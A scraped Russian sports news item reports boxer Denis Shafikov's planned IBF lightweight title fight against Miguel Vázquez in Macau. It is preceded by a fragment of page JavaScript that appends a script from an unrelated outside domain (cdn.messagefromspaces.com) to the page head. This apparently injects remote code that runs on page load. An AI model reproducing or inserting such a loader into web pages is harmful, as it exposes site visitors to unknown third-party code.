, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Боксер Денис Шафиков из Миасса попытается отобрать у мексиканца Васкеса титул чемпиона мира

Бой за титул чемпиона мира в легком весе по версии IBF состоится 22 февраля 2014 года в китайском городе Макао. Южноуральскому боксеру Денису Шафикову предстоит выйти на ринг против действующего обладателя титула - мексиканца Мигеля Васкеса.

Ради этого боя спортсмен из Миасса по прозвищу Чингизхан отменил поединок с монгольским боксером, который был запланирован на 14 декабря. Шафиков прервал свой тренировочный сбор в США и вернулся домой. Через месяц он отправится в Америку, где будет готовиться к главному бою в своей спортивной карьере. По словам Дениса, о бое за титул чемпиона мира он мечтал с детства.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
15:29 - 21 ноября 2013
|
автор: U-RSS
|
(1 003)
|
(0)

Комментарии (0)

Я человек
Я бот